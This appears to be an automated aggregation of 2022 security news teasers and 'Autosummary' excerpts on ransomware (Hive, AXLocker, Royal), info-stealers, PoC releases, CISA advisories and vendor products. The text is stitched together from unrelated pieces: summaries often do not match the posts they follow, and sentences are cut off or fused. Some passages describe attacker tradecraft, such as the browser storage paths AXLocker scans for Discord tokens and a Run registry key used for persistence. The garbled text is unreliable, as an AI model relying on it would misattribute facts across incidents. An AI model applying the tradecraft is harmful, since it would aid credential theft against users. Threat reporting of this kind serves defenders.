The latest iteration of the malware, which resurfaced on September 6, 2022, after the threat actor was forced to halt its operations on August 12 in response to public disclosure, comes with a host of improvements incorporated to circumvent detection. "Researchers discovered that analytics data associated with iPhone include Directory Services Identifier (DSID) that could allow identifying users. Researchers at software company Mysk discovered that analytics data collected by iPhone include the Directory Services Identifier (DSID), which could allow identifying users. Apple collects both DSID and Apple ID, which means that it can use the […]
The post Experts claim that iPhone’s analytics data is not anonymous appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
First seen in mid 2021, Hive is a ransomware-as-a-service (RaaS) operation, which different cybercriminals have used in attacks launched against healthcare institutions, non-profit organisations, energy providers, and retailers, amongst other sectors. "The operators behind the Ducktail information stealer continue to improve their malicious code, operators experts warn. In late July 2022, researchers from WithSecure (formerly F-Secure Business) discovered an ongoing operation, named DUCKTAIL, that was targeting individuals and organizations that operate on Facebook’s Business and Ads platform. Experts attribute the campaign to a Vietnamese financially motivated […]
The post Ducktail information stealer continues to evolve appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Emsisoft Anti-Malware Home detecting malware on a test machine Source: BleepingComputer Some of the features included in Emsisoft Anti-Malware are: A cloud-based dashboard to manage all of your devices; Emsisoft (A) & Bitdefender (B) Fast Scanning dual-engine scanner scans faster than others that use only one. "ReasonLabs has joined the Anti-Malware Testing Standards Organization (AMTSO), an international non-profit association that focuses on addressing the global need for improvement in the objectivity, quality and relevance of anti-malware testing methodologies. AMTSO is a member-driven organization that develops standards and guidelines for anti-malware testing, providing advice and guidance to the expert testers that make up its member organizations, as well as to others starting out in testing. The organization developed and maintains a Testing … More
The post ReasonLabs joins Anti-Malware Testing Standards Organization to strengthen anti-malware solutions appeared first on Help Net Security.
"Autosummary:
"As the markets continue to fluctuate, budget cuts and layoffs now extend across the tech industry, with cybersecurity no exception from tightening its belt and assessing its priorities. Investors are proceeding with caution and waiting to see a correction in valuations, while cybersecurity startups are examining their runway and long-term viability. The growing number and sophistication of cyberattacks, however, reinforce the need for heightened security awareness and innovation. Standing on the front lines of these … More
The post How entrepreneurs can capitalize on the impending golden age of cybersecurity appeared first on Help Net Security.
"Autosummary:
Udi Mokady, chairman and CEO of CyberArk, who amassed decades of experience working with cybersecurity professionals, says, “Never go frothy in good times, and never over-correct in bad times.As they grow, they must pay more attention to the correlation between growth rate and burn rate, unit economics in terms of customer acquisition and all the important basics — product-market fit, sales repeatability and more, before they begin to scale.” Greg Sands, managing director at Costanoa Ventures, agrees: “Those of us who help startups build brick-by-brick and grow at a good pace into stellar companies with great unit economics are not worried, and will not change our investing approach.” The mix of bountiful opportunities and a limited number of top-of-the-line vendors in the early 2000s brought about the “bronze age” of cybersecurity, as Richard called it, with the “silver age” dawning in the post-2008 crisis as cloud computing began its meteoric rise and helped establish the tech behemoths that are today iconic and publicly owned. "Autosummary:
To give these attacks a veneer of legitimacy, the adversaries, instead of dropping a malware like BazarLoader, take advantage of legitimate tools like Zoho Assist to remotely interact with a victim"s computer, abusing the access to deploy other trusted software such as Rclone or WinSCP for harvesting data. "Autosummary:
"In addition to cryptocurrency-based lures, these criminal enterprises have used gold, forex, stocks, and other subjects to exploit their victims," researchers Tim Kromphardt and Genina Po said. "Autosummary:
"Researchers warn of threat actors employing a new Go-based malware dubbed Aurora Stealer in attacks in the wild. Aurora Stealer is an info-stealing malware that was first advertised on Russian-speaking underground forums in April 2022. Aurora was offered as Malware-as-a-Service (MaaS) by a threat actor known as Cheshire. It is a multi-purpose botnet with data stealing […]
The post Aurora Stealer Malware is becoming a prominent threat in the cybercrime ecosystem appeared first on Security Affairs.
"Autosummary:
“These infection chains leveraged phishing pages impersonating download pages of legitimate software, including cryptocurrency wallets or remote access tools, and the 911 method making use of YouTube videos and SEO-poised fake cracked software download websites.” reads the analysis by the experts. "Autosummary:
The malicious app requests the user to grant risky permissions like reading and writing external storage, installing new packages, accessing account details, deleting packages (to wipe traces), etc. "Autosummary:
"Autosummary:
Avast said it has detected and blocked over 93,000 infections since the start of 2022, with a majority of the impacted users located in India, the U.S., Italy, Brazil, the U.K., Canada, France, Pakistan, and South Africa. "Autosummary:
Files encrypted by the Donut Ransomware Source: BleepingComputer The Donut Leaks operation has a flair for theatrics, using interesting graphics, a bit of humor, and even offering a builder for an executable that acts as a gateway to their Tor data leak site (see below). "Autosummary:
"To achieve this, the group likely compromised and co-opted internet-facing DVR/IP camera devices for command and control (C2) of Shadowpad malware infections, as well as use of the open source tool FastReverseProxy" Attacks linked to Boa web server flaws While Recorded Future didn"t expand on the attack vector, Microsoft said today that the attackers exploited a vulnerable component in the Boa web server, a software solution discontinued since 2015 that"s still being used by IoT devices (from routers to cameras). "Wipro has launched a strategic cybersecurity consulting offering in Europe. The announcement comes on the heels of a series of acquisitions in the consulting space—Edgile, Capco, and Ampion—and is part of the firm’s vision to build a global cybersecurity consulting offering to help clients stay ahead of a dynamic threat and regulatory environment. “Escalation of cyber threats, compounded by the rapidly changing regulatory environment, is creating brand new challenges for businesses across Europe,” said Tony … More
The post Wipro launches cybersecurity consulting offering for businesses across Europe appeared first on Help Net Security.
"Autosummary:
"Let’s give a look at API vulnerabilities by reading the API Security Top 10 published by the Open Web Application Security Project (OWASP). It’s no secret that cyber security has become a leading priority for most organizations — especially those in industries that handle sensitive customer information. And as these businesses work towards building robust […]
The post 5 API Vulnerabilities That Get Exploited by Criminals appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnThese include incomplete configurations, misconfigured HTTP headers, verbose error messages, open cloud storage, and more. When it comes to traditional security methods, they often lack the ability to track traffic over time, meaning they can’t easily identify high-volume attacks like credential stuffing. "Modern environments have become more dynamic and the need for equally progressive asset discovery techniques has intensified. The new Cybersecurity and Infrastructure Security Agency (CISA) Binding Operational Directive (BOD) 23-01 recognizes this fact. What is BOD 23-01? While it is only binding for US federal civilian agencies, the directive emphasizes the foundational asset discovery and intelligence capabilities all organizations must possess to be prepared for modern threats. Without the critical insight these capabilities provide, the … More
The post Future-proofing asset and vulnerability intelligence in response to CISA’s BOD 23-01 appeared first on Help Net Security.
"Autosummary:
Modern IT infrastructure approaches are increasingly complex, with software defined networks, hyper-segmentation, widespread adoption of multi-public cloud infrastructures, containerization, and the democratization of responsibility – and discovering new IP assets can seem futile.The scope of these scans is expansive, to include any IP connected device: a traditional desktop or server, network gear, video cameras, roaming devices, etc. 1. Agree on a common, inclusive definition of asset The legacy definition of a compute asset is no longer relevant, as the adversary’s line of sight extends far beyond IT devices. By accessing, aggregating, and correlating asset intelligence from across these existing sources, organizations can synthesize a comprehensive view of their cyber estate – a view that includes a great deal more context and which can be invaluable in a wide range of cybersecurity scenarios. 3. Gather a continuous, multidimensional view of each asset While siloed data sources can cause confusion during the asset management lifecycle, they can be extremely powerful when combined. "The Cybersecurity and Infrastructure Security Agency (CISA) is an agency of the United States Department of Homeland Security. CISA is in charge of enhancing cybersecurity and infrastructure protection at all levels of government, coordinating cybersecurity initiatives with American U.S. states, and enhancing defenses against cyberattacks. To assist businesses in enhancing their security capabilities, CISA offers free cybersecurity products and services. Cyber Hygiene Vulnerability Scanning You can register for this service by emailing vulnerability@cisa.dhs.gov. Scanning will start … More
The post 5 free resources from the Cybersecurity and Infrastructure Security Agency (CISA) appeared first on Help Net Security.
"Autosummary:
Checklist for implementing cybersecurity measures This document outlines four goals for your organization: Reducing the likelihood of a damaging cyber incident Detecting malicious activity quickly Responding effectively to confirmed incidents Maximizing resilience. "Experts from Cyble Research and Intelligence Labs (CRIL) discovered three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. Threat intelligence firm Cyble announced the discovery of three new ransomware families named AXLocker, Octocrypt, and Alice Ransomware. The AXLocker ransomware encrypts victims’ files and steals Discord tokens from the infected machine. The analysis of the code […]
The post Octocrypt, Alice, and AXLocker Ransomware, new threats in the wild appeared first on Security Affairs.
"Autosummary:
“After encrypting the victim’s files, the ransomware collects and sends sensitive information such as Computer name, Username, Machine IP address, System UUID, and Discord tokens to TA.” reads the analysis published by Cyble. "Autosummary:
" Among the primary countries targeted are the U.S., the U.K., Japan, Germany, Italy, France, Spain, Mexico, and Brazil. "Autosummary:
"Autosummary:
"Autosummary:
The highlight features listed in the promotional posts are: Polymorphic compilation that doesn’t require crypter wrapping Server-side data decryption Targets over 40 cryptocurrency wallets Automatic seed phrase deduction for MetaMask Reverse lookup for password collection Runs on TCP sockets Communicates with C2 only once, during license check Fully native small payload (4.2 MB) requiring no dependencies The above features are geared towards high-level stealthiness, which is the main advantage of Aurora over other popular info-stealers. "A researcher published details and proof-of-concept (PoC) code for High-Severity macOS Sandbox escape vulnerability tracked as CVE-2022-26696. Researcher Wojciech Reguła (@_r3ggi) of SecuRing published technical details and proof-of-concept (PoC) code for a macOS sandbox escape vulnerability tracked as CVE-2022-26696 (CVSS score of 7.8). In a wrap-up published by Regula, the researcher observed that the problem is caused […]
The post Expert published PoC exploit code for macOS sandbox escape flaw appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: As trust in online spaces degrades, Canada bolsters resilience against cyber attacks In this Help Net Security interview, Sami Khoury, Head of the Canadian Centre for Cyber Security, talks about how Canada is addressing today’s top threats, touches upon his long career and offers tips for those new to the industry. Russian hacktivists hit Ukrainian orgs with ransomware – but … More
The post Week in review: 5 Kali Linux tools, Spotify’s Backstage vulnerability, Cybertech NYC 2022 appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: November 18, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Abnormal Security, Bearer, Clumio, Cohesity, ForgeRock, Keyo, LOKKER, and SecureAuth. Why companies can no longer hide keys under the doormat For good reason, companies trust in encryption, blockchain, zero trust access, distributed or multi-party strategies, and other core technologies. "Autosummary:
To steal the Discord token, AxLocker will scan the following directories for and extract tokens using regular expressions: Discord\Local Storage\leveldb discordcanary\Local Storage\leveldb discordptb\leveldb Opera Software\Opera Stable\Local Storage\leveldb Google\Chrome\User Data\\Default\Local Storage\leveldb BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb AXLocker"s grab function (Cyble) Eventually, victims are served a pop-up window containing the ransom note, informing them that their data was encrypted and how they contact the threat actor to purchase a decryptor. "Proof-of-concept exploit code for two actively exploited Microsoft Exchange ProxyNotShell flaws released online. Proof-of-concept exploit code has been released online for two actively exploited vulnerabilities in Microsoft Exchange, known as ProxyNotShell. The two flaws are: they impact Exchange Server 2013, 2016, and 2019, an authenticated attacker can trigger them to elevate privileges to run PowerShell […]
The post PoC exploit code for ProxyNotShell Microsoft Exchange bugs released online appeared first on Security Affairs.
"Autosummary:
The two flaws are: CVE-2022-41040 – Microsoft Exchange Server Elevation of Privilege Vulnerability CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution Vulnerability they impact Exchange Server 2013, 2016, and 2019, an authenticated attacker can trigger them to elevate privileges to run PowerShell in the context of the system and gain arbitrary or remote code execution on vulnerable servers. "Autosummary:
Activities of the group chronicled by ESET, Google, Proofpoint, Cisco Talos, and Secureworks this year have revealed the threat actor"s pattern of using PlugX (and its variant called Hodur) to infect a wide range of entities in Asia, Europe, the Middle East, and the Americas. "Autosummary:
"Autosummary:
" The legislation, in its current form, requires companies (i.e., data processors) to follow sufficient security safeguards to protect user information, alert users in the event of a data breach, and stop retaining users" data should individuals opt to delete their accounts. "Autosummary:
When files are downloaded from an untrusted remote location, such as the Internet or an email attachment, Windows add a special attribute to the file called the Mark of the Web. This Mark of the Web (MoTW) is an alternate data stream that contains information about the file, such as the URL security zone the file originates from, its referrer, and its download URL. Mounted IMG file Source: BleepingComputer The JS file contains VB script that will read the data.txt file, which contains the "vR32" string, and appends the contents to the parameter of the shellexecute command to load the "port/resemblance.tmp" DLL file. "Microsoft warns that a threat actor, tracked as DEV-0569, is using Google Ads to distribute the recently discovered Royal ransomware. Researchers from the Microsoft Security Threat Intelligence team warned that a threat actor, tracked as DEV-0569, is using Google Ads to distribute various payloads, including the recently discovered Royal ransomware. The DEV-0569 group carries out […]
The post DEV-0569 group uses Google Ads to distribute Royal Ransomware appeared first on Security Affairs.
"Autosummary:
From August to October 2022, DEV-0569 attempted to spread the BATLOADER via malicious links in phishing emails, posed as legitimate installers for multiple popular applications, including TeamViewer, Adobe Flash Player, Zoom, and AnyDesk. "According to a recent Node4 report, IT managers have a generally positive view of public cloud platforms. Half of the respondents said that, despite benefits, they have had to migrate a workload back off a public cloud platform — and called out several potential shortcomings that could be behind this trend: 56% said their public cloud environment was more expensive to operate than initially forecast 22% identified service issues or capacity constraints 21% reported a … More
The post Cybersecurity implications of using public cloud platforms appeared first on Help Net Security.
"Autosummary:
"Trellix released The Threat Report: Fall 2022 from its Advanced Research Center, which analyzes cybersecurity trends from the third quarter (Q3) of 2022. The report includes evidence of malicious activity linked to ransomware and nation-state backed advanced persistent threat (APT) actors. It examines malicious cyberactivity including threats to email, the malicious use of legitimate third-party security tools, and more. Q3 cybersecurity trends US ransomware activity leads the pack: In the US alone, ransomware activity increased … More
The post Transportation sector targeted by both ransomware and APTs appeared first on Help Net Security.
"Autosummary:
Emerging threat actors scaled : The China-linked threat actor, Mustang Panda, had the most detected threat indicators in Q3, followed by Russian-linked APT29 and Pakistan-linked APT36.The China-linked threat actor, Mustang Panda, had the most detected threat indicators in Q3, followed by Russian-linked APT29 and Pakistan-linked APT36. "A China-based financially motivated group, tracked as Fangxiao, is behind a large-scale phishing campaign dating back as far as 2019. Researchers from Cyjax reported that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The sophisticated phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including […]
The post China-based Fangxiao group behind a long-running phishing campaign appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
The versions that fix the problem are: 7.6.19 or newer 7.17.12 or newer 7.21.6 or newer 8.0.5 or newer 8.1.5 or newer 8.2.4 or newer 8.3.3 or newer 8.4.2 or newer 8.5.0 or newer Users unable to upgrade to the fixed versions should disable "Public Signup", which would require the attacker to authenticate using valid credentials, which reduces the risk of exploitation. "Autosummary:
"Hive ransomware operators have extorted over $100 million in ransom payments from over 1,300 companies worldwide as of November 2022. The threat actors behind the Hive ransomware-as-a-service (RaaS) have extorted $100 million in ransom payments from over 1,300 companies worldwide as of November 2022, reported the U.S. cybersecurity and intelligence authorities. “As of November 2022, […]
The post Hive Ransomware extorted over $100M in ransom payments from over 1,300 companies appeared first on Security Affairs.
"Autosummary:
The authorities reported that from June 2021 through at least November 2022, threat actors employed the Hive ransomware in attacks aimed at a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH). "Autosummary:
Meanwhile, the real victims" addresses were written in the "CC" header, likely to evade security analysis and slow down investigations." - Trend Micro Although the hackers used various malware loading routines, the process typically involved DLL side-loading after the victim launched an executable present in the archives. "Help Net Security is attending Cybersecurity Marketing Society’s Cyber Marketing Con 2022 in Arlington, VA. Here’s a look at the event. Nathan Burke, CMO, Axonius Carmen Harris, Director, Product and Technology Communications, Sumo Logic Robin Campbell-Burt, CEO, Code Red Communications – Tanya Loh, Head of Marketing and Community, Forgepoint Capital – Melissa Goldberger, CMO, SafeBreach – Ryan Shopp, CMO, Deep Instinct – Michelle Schafer, SVP and Partner, Security Practice, Merritt Group Kaite Rosa, Sr. Director … More
The post Photos: Cybersecurity marketers gather at Cyber Marketing Con 2022 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Retrieved public key in obfuscated form (Unit221b) To overcome this final obstacle, Unit221b used a total of 800 central processing units (CPUs) in 20 servers, each with 40 CPUs. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @struppigel, @Ionut_Ilascu, @malwareforme, @malwrhunterteam, @DanielGallagher, @serghei, @jorntvdw, @fwosar, @LawrenceAbrams, @PolarToffee, @demonslay335, @FourOctets, @billtoulas, @VK_Intel, @BleepinComputer, @pcrisk, @Seifreed, @GeeksCyber, @BlackBerry, @ahnlab, and @MsftSecIntel. Finally, Ukraine says that a new Somnia ransomware is being used in attacks, CISA/FBI warned Iranian hackers breached a federal agency, and the FBI warned that Hive ransomware had made over $100 million in ransom payments. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Dave Bittner – @bittner Episode links: Sponsored by: Pentera – Pentera’s Automated Security Validation Platform is designed to help teams increase their security posture against modern day threats across the entire attack surface. "BitSight has enhanced its Third-Party Risk Management (TPRM) platform to provide additional insights to customers, helping them to more proactively detect and mitigate vulnerabilities and exposure across their third-party vendor ecosystem. BitSight also expanded its Fourth-Party Risk Management solution to increase visibility into risk across an organization’s extended supply chain and to help manage and prioritize mitigation efforts more efficiently. Third-Party Vulnerability Detection helps organizations to uncover, attribute, and prioritize vulnerabilities and exposures. Risk managers … More
The post BitSight Third-Party Vulnerability Detection increases visibility into vendor risk appeared first on Help Net Security.
"Autosummary:
“When Zero Days and other major security events occur, organizations struggle to quickly understand, remediate, and report on their exposure,” said Vanessa Jankowski, Vice President and General Manager of Third Party Risk Management, BitSight. "Resecurity has partnered with Saudi Cybersecurity Company (CyberKSA), a cybersecurity provider in the Kingdom of Saudi Arabia (KSA). The partnership will allow CyberKSA to offer award-winning cyber threat intelligence (CTI), dark web monitoring (DWM), digital risk management (DRM), fraud prevention (FP) and identity protection (IDP) products to consumer and enterprise organizations. The comprehensive portfolio of solutions will accelerate specialized offerings for MSSPs/ISPs and large enterprise customers looking to streamline their cybersecurity operations across their environment. … More
The post Resecurity collaborates with CyberKSA to combat threats targeting the industry appeared first on Help Net Security.
"Autosummary:
To reduce fragmentation, Resecurity is following a unified platform-as-a-service (PaaS) model, combining critical components of security service edge (SSE) and scalable data lake containing a massive volume of actionable cyber threat intelligence data and associated telemetry useful for implementation into security information and event management (SIEM), security operations center (SOC), cyber fusion center (CFS) and third-party systems and applications. "Cyber threats continue to increase in volume and complexity with threat actors developing new ways to avoid detection — including highly evasive malware. To help organizations outpace these evolving threats, Palo Alto Networks has announced PAN-OS 11.0 Nova, unleashing 50+ product updates and innovations. Amongst them are the new Advanced WildFire cloud-delivered security service that brings protection against evasive malware and the Advanced Threat Prevention (ATP) service which now protects against zero-day injection attacks. “We’ve … More
The post Palo Alto Networks PAN-OS 11.0 Nova protects organizations against zero-day threats appeared first on Help Net Security.
"Autosummary:
Integration of next-generation CASB: Palo Alto Networks next-generation Cloud Access Security Broker (CASB), natively integrated with Nova and Prisma SASE, now includes all-new SaaS Security Posture Management (SSPM) to help find and eliminate dangerous misconfigurations in 60+ enterprise SaaS apps. In addition to Advanced WildFire and Advanced Threat Prevention, notable innovations in the Nova release include: Simplified and consistent security Web Proxy support: For customers who need to run explicit proxies in their network due to network architecture or compliance requirements, Nova introduces natively integrated proxy capabilities for Palo Alto Networks NGFWs helping to secure web as well as non-web traffic. "Autosummary:
"Autosummary:
"Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," CISA noted. "Autosummary:
More than 400 organizations, including Emirates, Shopee, Unilever, Indomie, Coca-Cola, McDonald"s, and Knorr, are being imitated as part of the criminal scheme, the researchers said. "Autosummary:
However, when a user attempts to open this fake folder, the shortcut launches the Windows 10 Control Panel executable, control.exe, which is stored in the ISO file, as shown below. "Actions to Take Today to Mitigate Cyber Threats from Ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Enable and enforce multifactor authentication with strong passwords
• Close unused ports and remove any application not deemed necessary for day-to-day operations.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.
FBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.
Download the PDF version of this report: pdf, 852.9 kb.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See MITRE ATT&CK "
Autosummary:
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.Hive actors have also gained initial access to victim networks by distributing phishing emails with malicious attachments [T1566.001] and by exploiting the following vulnerabilities against Microsoft Exchange servers [T1190]: CVE-2021-31207 - Microsoft Exchange Server Security Feature Bypass Vulnerability CVE-2021-34473 - Microsoft Exchange Server Remote Code Execution Vulnerability CVE-2021-34523 - Microsoft Exchange Server Privilege Escalation Vulnerability After gaining access, Hive ransomware attempts to evade detention by executing processes to: Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption [T1562].From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Mitigations FBI, CISA, and HHS recommend organizations, particularly in the HPH sector, implement the following to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Hive ransomware: Verify Hive actors no longer have access to the network.Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).In addition, FBI, CISA, and HHS urge all organizations to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.Exploit Public-Facing Application T1190 Hive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321.Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your local FBI field office, or to CISA at report@cisa.gov or (888) 282-0870.Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks.The FBI may seek the following information that you determine you can legally share, including: Recovered executable files Live random access memory (RAM) capture Images of infected systems Malware samples IP addresses identified as malicious or suspicious Email addresses of the attackers A copy of the ransom note Ransom amount Bitcoin wallets used by the attackers Bitcoin wallets used to pay the ransom Post-incident forensic reports DISCLAIMER with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies. "Autosummary:
The randomly-named payload dropped on a newly created folder (BlackBerry) The ARCrypter payload then creates persistence by adding the following registry key: “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityUpdate” Next, the malware deletes all Shadow Volume Copies to prevent easy data restoration, modifies network settings to secure stable connectivity, and then encrypts all files except for the types shown below. "Autosummary:
"Public schools in two Michigan counties were forced to halt their activities, including the lessons, after a ransomware attack. Public schools in Jackson and Hillsdale counties, Michigan, reopen after a closure of two days caused by a ransomware attack that hit its systems. The public schools started experiencing a systems outage affecting critical operating […]
The post Two public schools in Michigan hit by a ransomware attack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Fake user testimonials on the survey pages Source: Akamai After "winning" the prize, the victim is requested to cover the shipping costs for receiving the prize, for which they need to enter their payment card details. "Micron Technology expands portfolio for its silicon root-of-trust solution, Authenta, making its cloud-based internet of things (IoT) security offerings more widely accessible. Micron is enabling Authenta in a family of Serial Peripheral Interface NOR (SPI-NOR) devices with increased density and packaging options and unveiling the Authenta Cloud Platform to help enterprises deploy and scale trust-based security at the intelligent edge. The company is also collaborating with security solutions expert Swissbit AG and new customer SanCloud … More
The post Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem appeared first on Help Net Security.
"Autosummary:
Swissbit, a leading European security and memory solution provider for IoT applications, and Micron are also now collaborating to embed Authenta technology in Swissbit’s security and storage solutions for IoT and industrial markets — bringing Micron’s unique silicon root-of-trust security features to Swissbit’s broad base of customers across areas such as industrial automation, automotive, IoT, medical, networking and communication. "Microsoft announced the Microsoft Supply Chain Platform, which helps organizations maximize their supply chain data estate investment with an open approach, bringing the best of Microsoft AI, collaboration, low-code, security and SaaS applications in a composable platform. The company also announced the preview of Microsoft Supply Chain Center, a ready-made command center for supply chain visibility and transformation and part of the Microsoft Supply Chain Platform. Supply Chain Center is designed to work natively with … More
The post Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems appeared first on Help Net Security.
"Autosummary:
In addition, to help customers find the best solution for their supply chain needs, Microsoft will continue to work with solution providers such as Blue Yonder, Cosmo Tech, Experlogix, Flintfox, inVia Robotics, K3, O9 Solutions, SAS, Sonata, To-Increase Software and many more. Accelerating business agility with the Microsoft Supply Chain Center At the core of the Supply Chain Platform is the Microsoft Supply Chain Center, now available in preview, which provides a command center experience for practitioners to harmonize data from across existing infrastructure supply chain systems, such as data from Dynamics 365, and other ERP providers, including SAP and Oracle, along with standalone supply chain systems. "Alif has collaborated with Telit to deliver developer kits that provide cloud-connected hardware and software reference designs for a wide variety of distributed and IoT edge applications. The kits focus on connected AI/ML-enhanced vision, voice, vibration, and sensor applications such as AI cameras, smart home, city infrastructure, biometric access control, and wearables. The kits leverage the Alif Ensemble family of microcontrollers (MCUs) and fusion processors. Ensemble devices utilize innovative aiPM power management technology that feature … More
The post Alif Semiconductor partners with Telit to develop and deploy IoT edge devices appeared first on Help Net Security.
"Autosummary:
"The expansion of cyber-physical systems in healthcare, particularly the IP “heartbeats” dispersed across hospital networks, has stretched cybersecurity beyond its IT legacy of monitoring for downed email and site uptimes at a clinic. As we look to expedite applying cybersecurity to protect the field of medicine and its evolving cyber-physical nature, patient safety should be our guiding star. Healthcare organizations already understand the priority; patient safety and the Hippocratic Oath guide the work of medical … More
The post Rallying cybersecurity and healthcare IT to support patient safety appeared first on Help Net Security.
"Autosummary:
Though, to be fair, medical professionals are usually granted ample resources to win the battle against patient disease, while hospitals’ IT teams are often lacking people, processes, and the technology support they need to foil ransomware, device hacking and other cybersecurity threats. The same as in healthcare, there is no substitute for a human in cybersecurity: a human that knows the network, knows the patient, knows the attackers, etc.For example: to date, consumer health monitoring apps have introduced unacceptable levels of risk to the medical community since they impact patient safety (inaccurate blood pressure measurement, etc.). "Malware attacks are commonplace today, executing within minutes and causing damage for weeks or months. Rapid detection and swift, effective incident response are essential in this situation. Today we will discuss five use cases of how a malware sandbox can help, so you can avoid any threats and find out the truth behind insidious files. What is a malware sandbox? Any company’s security system involves several layers of protection. A sandbox is one of the … More
The post 5 use cases with a malware sandbox appeared first on Help Net Security.
"Autosummary:
Once the file is opened, you’ve installed malware that can steal sensitive information, or it can be a part of a more significant attack, for example, ransomware. A simple change of the locale brought good results: in one case, the malware doesn’t run, and in the other, it shows its malicious properties.Locale change analysis Several malware programs stop working if the system lacks a certain language, time, or currency. For example, in the Raccoon Stealer sample, all processes were terminated if you selected the Belarus locale (be-BY). "Whether you’re facing a security audit or interested in configuring systems securely, CIS SecureSuite Membership is here to help. CIS SecureSuite provides thousands of organizations with access to an effective and comprehensive set of cybersecurity resources and tools to implement the CIS Critical Security Controls (CIS Controls) and CIS Benchmarks. Track compliance with industry frameworks, secure systems with more than 100 configuration guides, and more, all with one powerful Membership.
The post CIS SecureSuite Membership: Leverage proven best practices to improve cybersecurity appeared first on Help Net Security.
"Autosummary:
"When your computer or smartphone needs repairing, can you trust repair technicians not to access or steal your personal data? According to the results of a recent research by scientists with University of Guelph, Canada, you shouldn’t. Granted, they tested only 16 repair service providers with rigged devices, but in six cases technicians snooped on customers’ data and in two they copied the data to external devices. Oh, and most of them tried to cover … More
The post Electronics repair technicians snoop on your data appeared first on Help Net Security.
"Autosummary:
First they asked 18 repair service providers – national (big-box stores), regional (stores of a larger chain), local (mom-and-pop shops), and device manufacturers – whether they have a privacy policy or have set up controls to protect device owners’ personal data from snooping technicians, and found that most have not. "Autosummary:
"Autosummary:
Diagram of detected "TrojanOrders" attacks Source: Sansec The TrojanOrders attack TrojanOrders is the name of an attack that exploits the critical Magento 2 CVE-2022-24086 vulnerability, allowing unauthenticated attackers to execute code and inject RATs (remote access trojans) on unpatched websites. "From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the Federal Bureau of Investigation (FBI) assess that the FCEB network was compromised by Iranian government-sponsored APT actors.
CISA and FBI are releasing this Cybersecurity Advisory (CSA) providing the suspected Iranian government-sponsored actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.
